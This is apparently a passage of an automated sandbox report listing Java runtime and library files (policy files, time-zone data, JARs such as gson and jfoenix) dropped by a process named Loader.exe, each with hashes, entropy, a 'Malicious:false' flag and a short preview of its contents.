                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2515
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.490054643169131
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                                                                                                                                                                                                                                                                                              MD5:EC90FD04C2890584A16EB24664050C2A
                                                                                                                                                                                                                                                                                                              SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                                                                                                                                                                                                                                                                                              SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                                                                                                                                                                                                                                                                                              SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\java.security

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):27033
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.840685151784295
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                                                                                                                                                                                                                                                                                              MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                                                                                                                                                                                                                                                                                              SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                                                                                                                                                                                                                                                                                              SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                                                                                                                                                                                                                                                                                              SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\javaws.policy

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.802539000066613
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                                                                                                                                                                                                                                                                                              MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                                                                                                                                                                                                                                                                                              SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                                                                                                                                                                                                                                                                                              SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                                                                                                                                                                                                                                                                                              SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\security\local_policy.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3527
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.521709350514316
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                                                                                                                                                                                                                                                                                              MD5:57AAAA3176DC28FC554EF0906D01041A
                                                                                                                                                                                                                                                                                                              SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                                                                                                                                                                                                                                                                                              SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                                                                                                                                                                                                                                                                                              SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........H..C................META-INF/MANIFEST.MF...o.0...;....-..N.I.._..!S..^L..v+....~....K.....9.......-.qLc,.P.N..%QG.b....n...`..m.u...Yw...ak....+to..1.............."m.i8..z}{B...^uV...1..s.>>..Z-.&..%....A..W..t..c....?z.o....A.]d0a...^..a........./..'..NQQ.%...4..l..}....N..A.f..Q[G.K^.S...o..PK.....8....h...PK........H..C................META-INF/ORACLE_J.SF..Ko.0...}.....U....A........-!....c...4..m.E..F.;.G.c..5...AH.qW.93.....-...`...#.Y.1..=.......b....0/.p...`...}...!.N..a'.....'..?eW..(b..SD.(0;*=h.W\.....w........ ........hg. y.....D...1.L'+...P..QOM..f.w...{\m...Tl.&i..!N~..Q.5...8............/.....UzY..$>.}.m..'.............g>.....D.O...o..V...o.O....4....~.2.7..'.o/....}.PK...E..\.......PK........H..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\sound.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1249
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735634480139973
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                                                                                                                                                                                                                                                                                              MD5:BB63293B1207CB8608C5FBE089A1B06D
                                                                                                                                                                                                                                                                                                              SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                                                                                                                                                                                                                                                                                              SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                                                                                                                                                                                                                                                                                              SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\tzdb.dat

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):103910
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.113278604363908
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                                                                                                                                                                                                                                                                                              MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                                                                                                                                                                                                                                                                                              SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                                                                                                                                                                                                                                                                                              SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                                                                                                                                                                                                                                                                                              SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\tzmappings

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8602
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.204166069367786
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                                                                                                                                                                                                                                                                                              MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                                                                                                                                                                                                                                                                                              SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                                                                                                                                                                                                                                                                                              SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                                                                                                                                                                                                                                                                                              SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\release

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.416086012521588
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                                                                                                                                                                                                                                                                                              MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                                                                                                                                                                                                                                                                                              SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                                                                                                                                                                                                                                                                                              SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                                                                                                                                                                                                                                                                                              SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\asm-all.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):247787
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.915391305945515
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                                                                                                                                                                                                                                                                                              MD5:F5AD16C7F0338B541978B0430D51DC83
                                                                                                                                                                                                                                                                                                              SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                                                                                                                                                                                                                                                                                              SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                                                                                                                                                                                                                                                                                              SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........RT.IcT..............META-INF/MANIFEST.MF.....T]o.0.}G...x.6.......L.T..X_'.\..3.....h....).}r...zF.[.6.3(.........G..LFl. .....z4....4.A@*"........5&.....=..Ah^`.I....N.3......y1#.s.r.5h...D.J7.....s..2..4.05H5.{...A..|.,...}..C....'.tT.g.d.}..I../.....8.2&.w.........+.."..`c.y._...?..9.{........L3.0.....M...6..T.x.R.tQ..+#...`4.K..)f.L.5.^..(..22U....-.#.5Qdj.......n.e=5$..$b."...sA!..D....OO..fNg.... ui.2...=....-..R.G..E..V3..G..m.i..L...f.......8.`......^........!...`5.0V.%?...D&.Iy5.....?...V.._..m.T..B.:..-..Ng)%....}o.w._PK........RT.I................org/..PK........RT.I................org/objectweb/..PK........RT.I................org/objectweb/asm/..PK........RT.I............)...org/objectweb/asm/AnnotationVisitor.class..]O.`.....(+.....:']...`L..b...../.4M..R.~...&.%...~(.9m...3{..?...y....??....]..@E. .v.P.{b..w.'.....'.;......~....qt.^.i.....><.....}.&a..u..&l..{..u. ..........s'3..(L_.^.>.z...uU.<$(..9I.......'......'.........

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\dn-compiled-module.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):28704114
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988773216226492
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:393216:HC+XZLPe+o6uiZho6PymMgfmynpgT56myC62gOOOvExyBNCPr1TEX0dhVjYrO7Hn:DJD462gfmy6TIqOOJBMDyX0Bhei
                                                                                                                                                                                                                                                                                                              MD5:0FB96EFD0BD550DA21DE4DC08A4C8F0C
                                                                                                                                                                                                                                                                                                              SHA1:9EE5A8A3899B77ACF168F3C1B6E745EEFCA1FB6D
                                                                                                                                                                                                                                                                                                              SHA-256:401EBB772B8452DCA28047F09CEAFD22513B4CFB80FFEA3BF23D622F8C6032AB
                                                                                                                                                                                                                                                                                                              SHA-512:9BBF04B66517258F56D6EAC4DCC8B09108726105C8E09C7CCDD7B487B2469C4ED9EDC17A2A1573E7A3ACF90D0C145ADE5CB17B8331DDDA7F44288B2418D6D927
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........6.Y................META-INF/....PK.........6.Yc..\...h.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..y...R.KRSt.*A.-......u....4....sR......K..h.r.r..PK.........6.Y.................packages/PK.........6.Y................action/PK.........6.Y................app/PK.........6.Y................app/forms/PK.........6.Y................app/modules/PK.........6.Y................behaviour/PK.........6.Y................behaviour/custom/PK.........6.Y................bundle/PK.........6.Y................bundle/http/PK.........6.Y................bundle/jurl/PK.........6.Y................bundle/windows/PK.........6.Y................bundle/windows/api/PK.........6.Y................bundle/windows/result/PK.........6.Y................bundle/zip/PK.........6.Y................facade/PK.........6.Y................php/PK.........6.Y................php/compress/PK.........6.Y................php/framework/PK.........6.Y................php/gui/PK.........6.Y................p

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\dn-php-sdk.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13202
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.737712617961208
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                                                                                                                                                                                                                                                                                              MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                                                                                                                                                                                                                                                                                              SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                                                                                                                                                                                                                                                                                              SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                                                                                                                                                                                                                                                                                              SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................JPHP-INF/..PK........3.\K................JPHP-INF/sdk/..PK........3.\K..e.....\... ...JPHP-INF/sdk/ArithmeticError.phpe..j.0...@.Ac...n]..C..+8....)Xr....t.`cI.......i.K..t.V..F..)@...l.[B...G^b.E=I.a.2J..'..%.b. ^.......z........S ........v......d.h4...1NN]..,..t...~..yo&...G.....<@A...5. .\..ET.w;.S...w.....a..61...[.O....k....PK........3.\K.J.......... ...JPHP-INF/sdk/array-functions.php.Y]o.0.}G.?..M....M[.U.j.h.=F&..q2.0.u.}Nb ....:.@7p....p...Y...\]^v;.e.)C.....z.z.G...z1.P....h...U..H...jc.O..@4..U.._..K..C....6...q;..v.t;.})q....Q..eE..5wg+.l.c..V.......T{qJ..(53.cXn..<..#.k.....RI.A..8...D$..0..0]os...|...OR...p......]..`0.f.8.q....p...H....E..4>{...5.Xf.....5...Wms...>....LH..$,`C......T..#.#K..4".....f.-!h..MAle.m.a..2.....AZ......iT.Z.....Vu.J.a......p..4.6B..I..D9GY....}.L"Mh.....$...M.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\gson.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):231952
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8987047381149225
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                                                                                                                                                                                                                                                                                              MD5:5134A2350F58890FFB9DB0B40047195D
                                                                                                                                                                                                                                                                                                              SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                                                                                                                                                                                                                                                                                              SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                                                                                                                                                                                                                                                                                              SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/PK...........H..Q?....p.......META-INF/MANIFEST.MF.R]..0.|...`....$.8...SQ.C.....Kp... ..u>0.U..9.....Y....M..J3)2.....+A9..A..M.x.R.....q.SD].l{)w.......\..........=...N.n36..F.FM.../.b.6.A.D...l.Z].x4M'.t<.R7z..w.k}._.S@.g.z..81%E..dh.l.a.G.."'........n......Je.h6lM.(..r.{_.T&.....[....Z...N_. G.c............T6.z.z]m...N.s+..........R.Zg.`.Qg.a...a+e.J..W..%.P....7.I...$..wi.{...*...{...=.N......Q@.`v..$..G..........M./m3.....6.O.9...T.P.[X........~Lc.{Q$.QXHe=k...D.pE.nH...PK...........H................com/PK...........H................com/google/PK...........H................com/google/gson/PK...........H................com/google/gson/annotations/PK...........H................com/google/gson/internal/PK...........H................com/google/gson/internal/bind/PK...........H............#...com/google/gson/internal/bind/util/PK...........H................com/google/gson/reflect/PK...........H................com/google/g

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jfoenix.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2384613
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.97969261372729
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:4AMVFST+K4IV+Okq5gza804uttBkBVSHytYziSEI6WoAgdGXL:0FfK4ql5Ivu8kuSEdAgd+L
                                                                                                                                                                                                                                                                                                              MD5:6316F84BC78D40B138DAB1ADC978CA5D
                                                                                                                                                                                                                                                                                                              SHA1:B12EA05331AD89A9B09937367EBC20421F17B9FF
                                                                                                                                                                                                                                                                                                              SHA-256:D637E3326F87A173ABD5F51AC98906A3237B9E511D07D31D6AAFCF43F33DAC17
                                                                                                                                                                                                                                                                                                              SHA-512:1CDCA01ED9C2BC607207C8C51F4B532F4153E94B3846308332ECCAE25F9C5FDDF8279E3063F44A75DD43D696EAB0F9F340F9BF2F3EC805AB0F2F1DE5135A426C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK..........EK................META-INF/..PK..........EK+.".....=.......META-INF/MANIFEST.MF.XQo.6.~...`.ah...&iS..z=`..6\.a....fR....,..#m.l.q....H......R......T\.+'....m.....(t_x...y[.H.a<..K...."...........Ar.8..7....#..$v?.......|.....P$<..mQ!.[...L#.[/(.....Q...j.OUv........T.$b............ ..j....K.....h..t.H).2..G7.n..."t......2w.g....S.0.ma..d~./....]M/'W'...!.H..NJH.c.r..K......iz!..=.r.g.C&.$..1.loe.i.~pc.`.q.r..1.c..r.&d.~......'R.s2@.,..YU.Z...b..5D}!.Z..O....~s.Q.Y.x.~P...2iz.l.....r@?].=Kx\.............../.i..M[.)E".K.7.)..-T..@yU5b^.....iQ...t.m%...z.[..dYRa...O.=...T.?..h.L...>..=.Ivp.F"I...~.....B..I.....VK..[.e.kq.W..;....y......e..l..J.Q..OK.1..DH.Y._..M...=.z%o..5z~/.Bz.....TTtBn..g...m.L.!.T..>...<.9R.P......@..'.?]T...c./N-.x....x."D.r..f..{..`..#.=...&...5.T.W...n.@a........(..B..c@].....B..j...I.X.!...Y........\n.....t..4z...X'.>..3..'X0..l...HE}.a.2 ....+U?~...'ZP..0.t9.r.!..T.m....k..........Q..T...Ei..TU.5O.p.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\jphp-app-framework.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):106006
